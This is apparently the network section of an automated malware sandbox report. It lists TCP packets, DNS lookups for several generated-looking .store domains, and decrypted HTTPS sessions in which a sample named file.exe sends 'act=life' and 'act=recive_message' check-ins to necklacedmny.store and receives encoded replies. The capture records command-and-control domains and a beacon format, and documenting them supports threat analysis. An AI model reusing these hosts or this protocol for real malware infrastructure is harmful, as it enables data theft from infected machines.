                                                  Oct 30, 2024 02:27:00.290357113 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.290369034 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.290702105 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.342691898 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.350749969 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.350788116 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.350991964 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.796551943 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.796664953 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.796731949 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.798331976 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.798352003 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.798383951 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.798389912 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.885833025 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.885921001 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.886044025 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.897501945 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:00.897538900 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.506799936 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.506961107 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.508934975 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.508965015 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.509217978 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.510946035 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.510991096 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.511070013 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974016905 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974065065 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974098921 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974128962 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974137068 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.974170923 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974206924 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.974224091 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974256992 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974280119 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.974301100 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974395990 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:01.974400997 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974412918 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:01.974478006 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.090749979 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.090831995 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.090886116 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.090899944 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.090925932 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.090981960 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.090987921 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091001034 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091070890 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.091088057 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091109037 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091176033 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107687950 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107726097 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.107800007 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107815981 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.300184965 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300241947 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.300367117 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300796986 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300817013 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.910072088 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.910209894 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.912084103 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.912115097 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.912411928 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.913804054 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.914026022 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.914083958 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458579063 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458709002 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458817005 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.459115028 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.459158897 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.586864948 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.586937904 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.587115049 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.587433100 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.587486029 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.229799986 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.230056047 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.231663942 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.231689930 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.232036114 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.233659029 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233844995 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233894110 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.233962059 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233974934 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988037109 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988161087 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988240957 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.988358021 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.988405943 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.210288048 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210313082 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.210417986 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210844994 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210858107 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.844047070 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.844141006 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.846240044 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.846245050 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.846607924 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.848242998 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848479033 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848510981 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.848594904 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848603964 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.575942039 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.576203108 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.576308012 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.576308966 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.873975992 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.873987913 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.945806980 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.945837021 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.945919991 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.946346045 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.946356058 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.573899031 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.574027061 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.575645924 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.575653076 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.575851917 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.577249050 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.577356100 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.577359915 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044147015 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044377089 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044594049 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.044816017 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.044826984 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.598853111 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.598880053 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.599052906 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.599371910 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.599383116 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.216331005 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.216408968 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.218477964 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.218487978 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.218686104 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.220293999 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221298933 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221332073 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.221431971 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221462011 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.221579075 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221610069 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222156048 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222179890 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222335100 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222364902 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222521067 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222548962 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222579956 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222594023 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222718000 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222740889 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222773075 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222909927 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222942114 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232342005 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232518911 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232543945 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232554913 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232575893 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232633114 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.236560106 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.164943933 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.165194035 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.165296078 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.165561914 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.165576935 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.206334114 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206360102 CET44349711188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.206446886 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206770897 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206780910 CET44349711188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.546109915 CET49711443192.168.2.5188.114.97.3

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 30, 2024 02:26:59.580284119 CET5471253192.168.2.51.1.1.1
                                                  Oct 30, 2024 02:26:59.590156078 CET53547121.1.1.1192.168.2.5
                                                  Oct 30, 2024 02:26:59.599684000 CET5137453192.168.2.51.1.1.1
                                                  Oct 30, 2024 02:26:59.608649015 CET53513741.1.1.1192.168.2.5
                                                  Oct 30, 2024 02:26:59.610111952 CET6319053192.168.2.51.1.1.1
                                                  Oct 30, 2024 02:26:59.619949102 CET53631901.1.1.1192.168.2.5
                                                  Oct 30, 2024 02:26:59.622782946 CET6376353192.168.2.51.1.1.1
                                                  Oct 30, 2024 02:26:59.631856918 CET53637631.1.1.1192.168.2.5
                                                  Oct 30, 2024 02:26:59.635027885 CET5488653192.168.2.51.1.1.1
                                                  Oct 30, 2024 02:26:59.650221109 CET53548861.1.1.1192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 30, 2024 02:26:59.580284119 CET192.168.2.51.1.1.10xa4cfStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.599684000 CET192.168.2.51.1.1.10xc6ddStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.610111952 CET192.168.2.51.1.1.10x1320Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.622782946 CET192.168.2.51.1.1.10x4c1eStandard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.635027885 CET192.168.2.51.1.1.10x850cStandard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 30, 2024 02:26:59.590156078 CET1.1.1.1192.168.2.50xa4cfName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.608649015 CET1.1.1.1192.168.2.50xc6ddName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.619949102 CET1.1.1.1192.168.2.50x1320Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.631856918 CET1.1.1.1192.168.2.50x4c1eName error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.650221109 CET1.1.1.1192.168.2.50x850cNo error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                  Oct 30, 2024 02:26:59.650221109 CET1.1.1.1192.168.2.50x850cNo error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • necklacedmny.store

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549704188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:00 UTC265OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                  Data Ascii: act=life
                                                  2024-10-30 01:27:00 UTC1019INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=9llsouon0c736259orr6ecbb17; expires=Sat, 22 Feb 2025 19:13:39 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G063m0bUYH%2BIdHQAU9aHmiy5WDlecuQwe8P%2FnZ15gnLFBAqEcQoLEt%2FMvAUqA5rQDb4%2BLPsvxg69iRiwniOZWayFHeFRDn%2Fmfw%2FPoyuQAVXtZze5xlaHPgx8yuPwjYpkmrNragk%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79ed36c864772-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1930&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1472292&cwnd=239&unsent_bytes=0&cid=143ad0a75518f4aa&ts=530&x=0"
                                                  2024-10-30 01:27:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-10-30 01:27:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549705188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:01 UTC266OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 52
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:01 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                  Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                  2024-10-30 01:27:01 UTC1017INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=af34dma0ovfcnp8j6kjuh2dm81; expires=Sat, 22 Feb 2025 19:13:40 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onEGI7SXQrGzRXCuckSz5th81r3AbfPn3%2FG92WFUwEaVfWwXiiabJg3cQUSjeDsFpWQfH6rrKd%2FggX6j5eAzggwvP8B%2FqRJ%2FlUG6oXExjHWx765b9SzhfKx6hT%2FxaCajGR7Di6k%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79edaa8b0e9a4-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=1775597&cwnd=251&unsent_bytes=0&cid=c493dd26b1f63f09&ts=474&x=0"
                                                  2024-10-30 01:27:01 UTC352INData Raw: 31 64 39 36 0d 0a 51 4b 32 57 68 34 6e 51 58 78 75 36 61 6e 52 75 4a 63 35 36 6e 30 4d 6a 4d 6a 32 56 69 39 79 44 6e 4e 5a 68 78 46 44 64 6e 33 4d 37 6a 2b 43 6c 73 2b 52 7a 4f 63 6b 50 56 6c 52 52 76 41 2f 36 62 77 46 54 57 62 65 78 75 75 4c 77 70 51 54 6f 63 71 76 79 55 58 72 4c 39 2b 76 36 74 58 4d 35 33 78 4a 57 56 48 36 31 57 50 6f 74 41 51 67 66 38 4f 47 2b 34 76 43 30 41 4b 38 2f 72 66 4d 51 4b 4d 48 78 37 2b 79 7a 4f 33 72 57 42 78 45 4c 51 4b 38 51 38 53 70 4f 57 6c 43 33 70 2f 37 6d 35 76 52 62 35 68 32 34 36 78 49 4e 7a 4f 58 73 71 36 31 7a 59 4a 67 50 47 6b 77 66 37 42 76 36 49 55 39 55 57 66 37 6a 74 4f 76 34 74 51 57 75 49 4c 54 35 47 79 6a 50 38 75 37 6d 75 69 39 33 33 41 41 61 44 55 71 76 57 4c 4e 68 52 6b 67 66 72 36 6e 74 30 2f 32 6c 45
                                                  Data Ascii: 1d96QK2Wh4nQXxu6anRuJc56n0MjMj2Vi9yDnNZhxFDdn3M7j+Cls+RzOckPVlRRvA/6bwFTWbexuuLwpQTocqvyUXrL9+v6tXM53xJWVH61WPotAQgf8OG+4vC0AK8/rfMQKMHx7+yzO3rWBxELQK8Q8SpOWlC3p/7m5vRb5h246xINzOXsq61zYJgPGkwf7Bv6IU9UWf7jtOv4tQWuILT5GyjP8u7mui933AAaDUqvWLNhRkgfr6nt0/2lE
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 76 71 76 7a 31 72 30 41 4d 64 43 56 57 6e 45 66 41 73 51 56 31 56 2b 4f 71 2b 35 76 53 2b 44 4b 77 32 73 76 41 58 49 73 2b 30 71 36 75 31 4a 54 6d 41 53 44 55 4a 56 36 73 55 36 32 4e 37 45 45 43 35 38 50 37 6d 38 76 52 62 35 6a 71 36 2f 68 49 70 77 50 66 74 34 4b 41 39 61 39 34 46 45 78 35 42 71 52 62 33 49 6c 4e 61 55 66 48 71 74 2b 72 33 73 51 53 69 63 76 47 39 46 6a 71 50 72 4b 58 4b 76 7a 5a 31 30 68 38 57 54 46 6a 69 41 62 30 6d 54 52 41 48 74 2b 32 2f 35 66 2b 77 44 61 67 32 73 2f 73 66 4c 38 44 79 37 2b 75 31 4e 33 48 51 43 52 73 48 53 4b 77 64 38 43 56 48 58 46 37 79 71 66 43 68 2b 61 78 44 2f 6e 4b 52 2b 68 49 77 6a 63 48 6d 35 62 77 36 62 35 67 58 57 42 55 48 71 78 53 39 65 51 46 65 57 76 6a 37 76 2f 50 37 75 68 47 71 4e 37 6e 77 45 69 7a 50 38
                                                  Data Ascii: vqvz1r0AMdCVWnEfAsQV1V+Oq+5vS+DKw2svAXIs+0q6u1JTmASDUJV6sU62N7EEC58P7m8vRb5jq6/hIpwPft4KA9a94FEx5BqRb3IlNaUfHqt+r3sQSicvG9FjqPrKXKvzZ10h8WTFjiAb0mTRAHt+2/5f+wDag2s/sfL8Dy7+u1N3HQCRsHSKwd8CVHXF7yqfCh+axD/nKR+hIwjcHm5bw6b5gXWBUHqxS9eQFeWvj7v/P7uhGqN7nwEizP8
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 36 62 35 67 58 57 42 55 48 71 78 53 39 65 51 46 63 56 76 66 69 74 4f 58 2b 73 77 36 6a 4d 62 6a 2b 48 43 58 46 2b 75 4c 76 76 6a 52 30 33 67 67 52 43 45 4b 2b 48 66 51 74 54 52 41 52 74 2b 36 6d 6f 61 62 30 4c 4b 45 6b 76 4e 49 53 4d 38 61 30 2b 71 57 72 66 58 37 55 53 45 35 4d 51 4b 6b 51 39 69 64 4a 55 45 33 79 35 37 58 67 39 4c 49 43 71 7a 36 35 2f 52 41 69 79 66 6a 6c 37 4c 55 76 61 39 30 4f 42 41 59 48 34 6c 6a 36 4f 51 45 49 48 38 48 35 71 66 44 6f 39 6a 61 6c 50 4c 48 36 42 32 4c 51 75 76 79 72 74 54 45 35 67 45 67 64 44 45 75 72 45 50 73 6c 53 56 39 51 2f 76 75 2f 37 66 43 6d 42 4b 59 37 73 66 49 64 4b 38 4c 7a 36 4f 43 34 4d 48 33 66 43 56 5a 43 42 36 73 41 76 58 6b 42 5a 6b 2f 36 35 5a 44 71 38 72 31 44 75 58 79 6d 76 52 59 75 6a 36 79 6c 37 37
                                                  Data Ascii: 6b5gXWBUHqxS9eQFcVvfitOX+sw6jMbj+HCXF+uLvvjR03ggRCEK+HfQtTRARt+6moab0LKEkvNISM8a0+qWrfX7USE5MQKkQ9idJUE3y57Xg9LICqz65/RAiyfjl7LUva90OBAYH4lj6OQEIH8H5qfDo9jalPLH6B2LQuvyrtTE5gEgdDEurEPslSV9Q/vu/7fCmBKY7sfIdK8Lz6OC4MH3fCVZCB6sAvXkBZk/65ZDq8r1DuXymvRYuj6yl77
